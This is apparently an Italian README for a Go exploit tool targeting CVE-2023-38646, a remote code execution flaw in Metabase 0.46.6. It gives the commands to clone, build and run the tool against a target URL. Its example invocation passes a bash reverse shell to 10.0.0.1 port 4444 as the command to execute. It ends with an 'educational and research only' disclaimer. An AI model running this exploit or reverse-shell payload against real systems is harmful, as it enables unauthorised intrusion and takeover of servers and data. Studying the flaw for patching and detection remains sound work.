
Exploit per CVE-2023-38646 in Metabase 0.46.6, che consente l'esecuzione remota di codice tramite richieste appositamente predisposte e recupero del token di configurazione.
Exploit per CVE-2023-38646 Metabase 0.46.6
Questo strumento sfrutta una vulnerabilità (CVE-2023-38646) in una piattaforma software. L'exploit consente l'esecuzione remota di codice tramite una richiesta appositamente predisposta, sfruttando una stringa di connessione al database gestita in modo non corretto.
Lo strumento:
Clona il repository:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: L'URL della piattaforma da scansionare e sfruttare. COMMAND: Il comando da eseguire sul target. PROXY_URL (Opzionale): L'URL del server proxy (es. http://127.0.0.1:8080). Se non fornito, non verrà utilizzato alcun proxy.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
Questo strumento è destinato esclusivamente a scopi educativi e di ricerca. Assicurati sempre di avere la dovuta autorizzazione prima di scansionare o sfruttare qualsiasi target. L'uso improprio di questo strumento è strettamente contrario all'intenzione dello sviluppatore e potrebbe essere illegale.
Sentiti libero di aprire issue per qualsiasi feedback, bug o richiesta di funzionalità. Le pull request sono sempre benvenute!